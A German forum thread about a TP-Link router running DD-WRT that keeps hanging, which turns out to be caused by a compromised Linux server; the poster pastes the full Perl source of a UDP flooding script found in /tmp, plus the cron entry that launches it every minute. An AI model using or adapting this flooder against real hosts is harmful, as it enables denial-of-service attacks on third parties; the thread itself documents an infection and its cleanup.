Tp-Link wr1043nd dd-wrt Probleme 64Mbit/s

In vielen Netzen von Unitymedia sind Internet und Telefonie bereits verfügbar.
Forumsregeln
  • Kunden aus Hessen und Nordrhein-Westfalen können über die Rufnummer 0221 / 466 191 00 Hilfe bei allen Problemen in Anspruch nehmen.
  • Kunden aus Baden-Württemberg können über die Rufnummer 0711 / 54 888 150 Hilfe bei allen Problemen in Anspruch nehmen.
david_ffm
Kabelneuling
Beiträge: 20
Registriert: 25.11.2010, 09:34

Re: Tp-Link wr1043nd dd-wrt Probleme 64Mbit/s

Beitrag von david_ffm » 07.03.2011, 22:06

addicted hat geschrieben:Sorry, da hast Du mich missverstanden - VLAN war nicht ganz ernst gemeint und lediglich als Alternative zu mehreren Netzwerkkarten in Deinem Server gedacht. Es gibt keine mir bekannten speziellen VLAN Router. VLAN-Unterstützung wird in einen Switch eingebaut, einen Router brauchst Du weiterhin (in dem Fall dann Deinen Server, aber da warst Du ja eher abgeneigt).
Ich verstehe aber nicht, wie mir da ein VLAN switch mehr hilft als ein normales switch. VLAN scheint für
den Fall gedacht dass man mehrere LANS hat und die nicht unbedingt durch physikalischen netzwerk-Segmente
definieren will. Das wäre sehr praktisch in dem Fall aber ich habe und brauche ja nur eine LAN.
addicted hat geschrieben: Hat sich der DD-WRT Support mal Logfiles oder sowas schicken lassen?
Verstehe ich nicht ganz - welche logfiles sollen sie schicken? Oder ich? Ich denke nicht, dass es da Support
gibt, höchstens kann man so wie hier in dem Forum posten.

addicted
Kabelkopfstation
Beiträge: 3833
Registriert: 15.03.2010, 02:35

Re: Tp-Link wr1043nd dd-wrt Probleme 64Mbit/s

Beitrag von addicted » 08.03.2011, 11:15

david_ffm hat geschrieben:Ich verstehe aber nicht, wie mir da ein VLAN switch mehr hilft als ein normales switch.
Vergiss das VLAN. Es ging darum, dass Du in Deinen Server eine zweite NIC einbauen wolltest, und ihn dann als Router verwendest. Wenn Du das nichtmehr vor hast, musst Du auch nicht über VLAN nachdenken.

david_ffm hat geschrieben:
addicted hat geschrieben:Hat sich der DD-WRT Support mal Logfiles oder sowas schicken lassen?
Verstehe ich nicht ganz - welche logfiles sollen sie schicken? Oder ich? Ich denke nicht, dass es da Support
gibt, höchstens kann man so wie hier in dem Forum posten.
Tjaaaa ... ;)

david_ffm
Kabelneuling
Beiträge: 20
Registriert: 25.11.2010, 09:34

Re: Tp-Link wr1043nd dd-wrt Probleme 64Mbit/s

Beitrag von david_ffm » 08.03.2011, 14:51

addicted hat geschrieben: Vergiss das VLAN. Es ging darum, dass Du in Deinen Server eine zweite NIC einbauen wolltest, und ihn dann als Router verwendest. Wenn Du das nichtmehr vor hast, musst Du auch nicht über VLAN nachdenken.
Ja, das hatte ich auch so verstanden, und das überlege ich immer noch als Option. Eine laufende linux-Kiste
wo man voll darauf zugreifen kann auch mit Konsole hängt sich nicht einfach so auf, oder wenn er das doch
tut, hat man ganz andere Möglichkeiten das Problem zu analysieren. Der Linux Kernel und insbesondereund
TCP-IP-Stack sind sehr ausgereift, getestet und stabil, was man nicht unbedingt für DD-WRT sagen kann.
Aber wie wurde mir da die VLAN Switch helfen?

addicted
Kabelkopfstation
Beiträge: 3833
Registriert: 15.03.2010, 02:35

Re: Tp-Link wr1043nd dd-wrt Probleme 64Mbit/s

Beitrag von addicted » 08.03.2011, 15:09

Oki, also die Details :)


Ein VLAN-fähiger Switch kann einzelnen Hardware-Ports VLAN-Markierungen zuweisen. Im Wesentlichen sortiert er seine Ports in unterschiedliche Netze. Man kann aber auch einen Port in mehrere Netze hängen.

Hier zunächst das Setup:
Für alle Switchports legst Du ein Default-VLAN an, z.B. "1". Jetzt legst Du ein weiteres VLAN an, z.B. "42", und weist diesem einen Port am Switch zu. Das Default-VLAN entfernst Du von diesem Port, und dann schließt Du das Kabelmodem daran an. Dann legst Du den Port an dem Dein Linuxserver hängt zusätzlich in VLAN 42, so dass dieser also in beiden VLANs, "1" und "42", ist. Setze auf dem Port für Pakete mit fehlender VLAN-Markierung noch das Default VLAN "1" als Ziel.
Auf dem Linuxserver konfigurierst Du Dir nun ein virtuelles Interface, z.B. "vlan42", welches als VLAN-Interface mit der VLAN-Markierung "42" auf dem normalen Ethernet Interface (z.B. "eth0") aufsetzt.

Was jetzt passiert:
Jetzt kann der Linuxserver über dieses Interface direkt mit dem Modem reden, ohne eine weitere NIC zu benötigen. Sendet er aber Pakete auf eth0, setzt der Switch diese automatisch auf VLAN 1, welches nicht an den Port zum Kabelmodem gesendet wird, sondern nur an die anderen LAN Ports. Ankommende Pakete mit VLAN "1" sollten an eth0 anliegen, sofern kein zugehöriges VLAN-Interface existiert.
Auf vlan42 kannst Du ganz normal DHCP machen, und bekommst direkt auf dem Server die öffentliche IP-Adresse mit allen Vorteilen (z.B. Proto41 für IPv6) und Nachteilen (Portscans, Bruteforce, etc.).

Benutzeravatar
karl99
Kabelneuling
Beiträge: 11
Registriert: 02.04.2010, 19:28

Re: Tp-Link wr1043nd dd-wrt Probleme 64Mbit/s

Beitrag von karl99 » 08.03.2011, 16:42

Hallo!

Die neuste eko gibt es hier: http://www.dd-wrt.com/site/support/othe ... r1043nd%2F
cu
karl

david_ffm
Kabelneuling
Beiträge: 20
Registriert: 25.11.2010, 09:34

Re: Tp-Link wr1043nd dd-wrt Probleme 64Mbit/s

Beitrag von david_ffm » 09.03.2011, 09:58

addicted hat geschrieben:Oki, also die Details :)
...
Besten Dank dass du dir Zeit für die Erklärung genommen hast - das wäre tatsächlich eine interessante Lösung.
Wie ist es aber dann mit den anderen Clients, die ins internet wollen? Die hängen im VLAN1, bekommen per DHCP eine IP vom Server,
vermutlich auch default Gateway und DNS. Aber auf dem Server muss dann bridging oder routing auch konfiguriert sein zwischen vlan42
und eth0, oder? Und wie wurde ich dann WLAN bekommen? Ein Access Point auch im VLAN1 hängen, oder gibt es VLAN switches die auch
WLAN haben?
Jetzt suche ich nach einem preiswerten VLAN Router - der D-Link DES-3624i gibt es gebraucht bei eBay für EUR50, hat auch reichlich ports
nur laut Handbuch könnte der Stromverbrauch schon bei 48W liegen, das ist mehr als der Linux Server selbst und schon viel für den
dauerbetrieb zuhause.

Ich habe heute morgen aber auch weiteres zum ursprunglichen Problem beobachten können. Ich habe den TP-Link wr1043nd wieder auf
ursprungliche Firmware zurückgestellt, dennoch hat er sich in der Nacht aufgehängt, Symptome genau wie unter DD-WRT. Ich habe alles
abgestöpselt bis auf Modem und einem PC, dann ginge alles. Langsam alles wieder reingesteckt und festgestellt, sobald ich mein Server
anschliesse ist der Router nicht mehr ansprechbar! Server abgekoppelt, geht alles wieder. Server ist ein ganz normale linux-Kiste mit
SuSe 11 und eine xampp Installation, apache, mysql usw., auch fhem Heimautomation - keine Ahnung, wie er es schafft den Router
runterzuziehen aber so siehts aus im Moment. Ein rootkit virus?! Sobald ich Zeit habe werde ich den Server genauestens anschauen,
was da in solchen Fällen abgeht.

@Karl: Besten Dank, von da hatte ich auch meine DD-WRT - was ich nicht so ganz kappiere ist wieso in meinem Router v24 sp2 steht
und die neueste V24 sp1 ist?! Naja, egal, ich denke nach dem Experiment von heute, dass das Problem doch nicht bei DD-WRT liegt,
und ich werde auch dazu zurückgehen - die erweiterete Funktionalität ist unwiederstehlich ;-)

addicted
Kabelkopfstation
Beiträge: 3833
Registriert: 15.03.2010, 02:35

Re: Tp-Link wr1043nd dd-wrt Probleme 64Mbit/s

Beitrag von addicted » 09.03.2011, 14:51

david_ffm hat geschrieben:Wie ist es aber dann mit den anderen Clients, die ins internet wollen?
Wie Du schon schriebst, musst Du dann NAT und Forwarding auf dem Server aktivieren. Ich ging davon aus, dass Du das wusstest, weil es bei Deiner ursprünglichen Idee mit mehreren NICs im Server ja auch nötig ist.
Du kannst einen WLAN-Accesspoint oder einen Router im Accesspoint-/Bridge-Modus einfach mit an den Switch stecken, der landet dann im VLAN 1 wie die kabelgebundenen Geräte auch. Wenn Du einen Usecase dafür hast, könntest Du auch ein eigenes VLAN für Dein WLAN definieren und dass ebenfalls auf dem Server konfigurieren, dann kannst Du für WLAN-Clients z.b. andere Regeln definieren als für Dein LAN (und insbesondere auch WLAN und LAN voneinander trennen).

Ich würde es an Deiner Stelle nicht zu kompliziert machen. Ich kenne es von mir selbst, dass man sauviel Arbeit in das Setup investiert, es dann aber im alltäglichen Betrieb garnicht benötigt, aber wenn mal was schiefgeht benötigt man wieder viel Zeit für die Fehlersuche, weil alles so komplex ist.

Vielleicht baut Dein Server zuviele parallele Verbindungen auf? Nicht alle Hardwarerouter kommen damit zurecht.

david_ffm
Kabelneuling
Beiträge: 20
Registriert: 25.11.2010, 09:34

Re: Tp-Link wr1043nd dd-wrt Probleme 64Mbit/s

Beitrag von david_ffm » 09.03.2011, 20:34

addicted hat geschrieben:
david_ffm hat geschrieben:Wie ist es aber dann mit den anderen Clients, die ins internet wollen?
Vielleicht baut Dein Server zuviele parallele Verbindungen auf? Nicht alle Hardwarerouter kommen damit zurecht.
Nicht zu fassen - ich habe tatsächlich auf dem Linux Server etwas böses eingefangen!
Im Crontab von nobody steht:
* * * * * /tmp/.dada/.s.s/update >/dev/null 2>&1
(wird also jede Minute ausgeführt)
Im Prozessraum war zu sehen:
nobody 9257 5434 99 16:49 ? 01:53:59 /usr/bin/perl ./x 92.114.4.17 0 0
der annährend 100% CPU verbraucht...
und dann gibt es eine Datei /tmp/.dada/.s.s/x die so aussieht wie unten.
Klar, wenn man die "for (;;)" Schleife anschaut, dass so etwas jeden Router zerhauen kann!
Jetzt muss ich erstmal schauen, wie ich das wegkriege und wie ich mich für eine Neuinfektion
schutzen kann - wenn der Server überhaupt noch zu retten ist. Naja, ganz so raffiniert scheint
es nicht zu sein, ist auf jeden Fall kein stuxnet ;-)


#!/usr/bin/perl

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
printf "$0 <ip> <port> <time>\n";
printf "if arg1/2 =0, randports/continous packets.\n";
exit(1);
}

my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[1];
$time=$ARGV[2];

socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ip");

printf "Slashing SirVic's server on victim...\n";

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 x) &");
goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto randpackets;
}

packets:
for (;;) {
$size=$rand x $rand x $rand;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

randpackets:
for (;;) {
$size=$rand x $rand x $rand;
$port=int(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

addicted
Kabelkopfstation
Beiträge: 3833
Registriert: 15.03.2010, 02:35

Re: Tp-Link wr1043nd dd-wrt Probleme 64Mbit/s

Beitrag von addicted » 09.03.2011, 22:19

Jap, das könnte es gewesen sein ;)
Das Script auf hax.asia. Die gebombte IP scheint in Rumänien vergeben zu sein.
Naja, viel Spaß bei der Neuinstallation.

piotr
Glasfaserstrecke
Beiträge: 2202
Registriert: 13.08.2008, 18:26

Re: Tp-Link wr1043nd dd-wrt Probleme 64Mbit/s

Beitrag von piotr » 09.03.2011, 23:36

Brauchst Du wirklich PHP oder geht es auch ohne?

Wenn PHP nicht sicher genug konfiguriert ist und/oder die PHP-Applikation nicht auf dem aktuellen Stand ist, dann ist recht einfach ueber PHP Exploits Dein aus dem Internet erreichbares Linux-System zu uebernehmen.

Teilweise reicht es bereits aus zu wissen welche PHP-Version installiert ist... das bekommt man mit der Default PHP-Konfiguration sehr schnell raus. Auch ohne dass Du es irgendwo in Deiner PHP-Applikation anzeigst.

Viel Spass beim Lesen:
http://www.heise.de/security/artikel/Gr ... 70918.html

david_ffm
Kabelneuling
Beiträge: 20
Registriert: 25.11.2010, 09:34

Re: Tp-Link wr1043nd dd-wrt Probleme 64Mbit/s

Beitrag von david_ffm » 10.03.2011, 09:29

addicted hat geschrieben:Jap, das könnte es gewesen sein ;)
Das Script auf hax.asia. Die gebombte IP scheint in Rumänien vergeben zu sein.
Naja, viel Spaß bei der Neuinstallation.
Danke, ja, soviel habe ich auch ergoogelt...allerdings nicht, wer "Sir Vic" ist oder warum sein Server angegriffen werden soll ;-)

Immerhin habe ich kein Indiz dafür, dass sich die Prozesse root-Rechte haben beschaffen können. Sie tarnen sich auch
als httpd, laufen aber alle unter der Kennung "nobody". Ich habe die exploits in /tmp alle gelöscht, crontab deaktiviert, getarnte
httpd Prozesse beendet, avira installiert und gescanned, neu gestartet, auch einige root crontabs eingerichtet die mir stundlich
über diverse Stati berichten.
Ich werde es so eine Weile beobachten. Ein neu-Aufsetzen wäre denkbar, aber ich denke kaum sinnvoll vor ich weiss wie der Mist
auf meinem Server gekommen ist und dieser unterbinden kann.

@piotr: Vielen Dank für die Link. Ich kann leider kaum auf PHP oder Perl verzichten, der grösste Teil der Funktionalität
auf meinem Server verlässt sich auf eins von beiden. Ich werde mich wohl mit dem Thema in Detail jetzt befassen mussen,
es scheint sehr aufwändig zu sein. Ich wurde gerne den genauen Infektionsweg kennen, weiss nicht, ob ich das irgendwie
herausfinden kann.

addicted
Kabelkopfstation
Beiträge: 3833
Registriert: 15.03.2010, 02:35

Re: Tp-Link wr1043nd dd-wrt Probleme 64Mbit/s

Beitrag von addicted » 10.03.2011, 11:00

Mir fällt grad auf: Ist bei es bei SUSE per Default erlaubt, dass nobody eine Crontab haben darf?

david_ffm
Kabelneuling
Beiträge: 20
Registriert: 25.11.2010, 09:34

Re: Tp-Link wr1043nd dd-wrt Probleme 64Mbit/s

Beitrag von david_ffm » 11.03.2011, 10:02

addicted hat geschrieben:Mir fällt grad auf: Ist bei es bei SUSE per Default erlaubt, dass nobody eine Crontab haben darf?
anscheinend schon...ich habe mehrere SuSe 10 und 11 installationen und bei mir steht nur gast
in cron.deny, das wurde bedeuten, dass alle andere durfen. Bis jetzt scheint alles rühig zu sein -
habe festgestellt, dass xampp defaultmässig der phpmyadmin Seite für mysql admin offen lässt
ohne passwort! Das finde ich ein unding! Möglicherweise kommt das Zeug von dort auf dem
Rechner, da kann man so ziemlich alles machen.

oxygen
Glasfaserstrecke
Beiträge: 1311
Registriert: 30.09.2009, 16:53

Re: Tp-Link wr1043nd dd-wrt Probleme 64Mbit/s

Beitrag von oxygen » 11.03.2011, 10:31

xampp ist nur für lokale Installationen geeignet (steht auch überall). Für öffentlich erreichbare Installationen sollte man tunlichst die Distributionspakete verwenden.

Telekom Entertain IP VDSL50 mit IPv6/IPv4-Dual-Stack Router: Netgear DGNB3800B
Früher: Unitymedia

david_ffm
Kabelneuling
Beiträge: 20
Registriert: 25.11.2010, 09:34

Re: Tp-Link wr1043nd dd-wrt Probleme 64Mbit/s

Beitrag von david_ffm » 11.03.2011, 11:09

oxygen hat geschrieben:xampp ist nur für lokale Installationen geeignet (steht auch überall). Für öffentlich erreichbare Installationen sollte man tunlichst die Distributionspakete verwenden.
Stimmt auch wieder... ich bin gewissermassen selber Schuld, hast du Recht.
Ich werde irgendwie die Zeit finden mussen um die standard-Pakete so lange zu bearbeiten,
dass alles funktioniert und trotzdem sicher ist. Der default ist da leider Sicherheit zu erreichen,
indem man alles abschaltet.

Benutzeravatar
Nicht
Kabelneuling
Beiträge: 20
Registriert: 27.08.2010, 11:52
Wohnort: Dortmund

Re: Tp-Link wr1043nd dd-wrt Probleme 64Mbit/s

Beitrag von Nicht » 11.03.2011, 17:19

Das Problem scheint sich ja gelöst zu haben.
Wollte nur anmerken dass ich auch den TP-Link benutze, wenn auch derzeit mit der Stock-Firmware.

Habe derartige Probleme nicht.
2play Premium 200 mit Cisco EPC3208 und IPv4

david_ffm
Kabelneuling
Beiträge: 20
Registriert: 25.11.2010, 09:34

Re: Tp-Link wr1043nd dd-wrt Probleme 64Mbit/s

Beitrag von david_ffm » 12.03.2011, 23:23

oxygen hat geschrieben:xampp ist nur für lokale Installationen geeignet (steht auch überall). Für öffentlich erreichbare Installationen sollte man tunlichst die Distributionspakete verwenden.
Naja, stimmt eigentlich auch nicht so ganz... nur so, dass der Eindruck nicht im Thread bleibt, dass xampp an sich das Problem ist, steht auf der deutsche Homepage:

XAMPP ist so vorkonfiguriert, dass möglichst alle Features von Apache und Co aktiviert sind. So, wie es z. B. für einen Entwickler am angenehmsten ist.
XAMPP ist dadurch nicht als sicher einzustufen und ist somit nicht sofort für den Produktions-Betrieb geeignet.
Mit einigen Handgriffen (siehe FAQs) läßt sich XAMPP aber auch schnell internettauglich sicher machen.

Antworten

Wer ist online?

Mitglieder in diesem Forum: Maurice und 1 Gast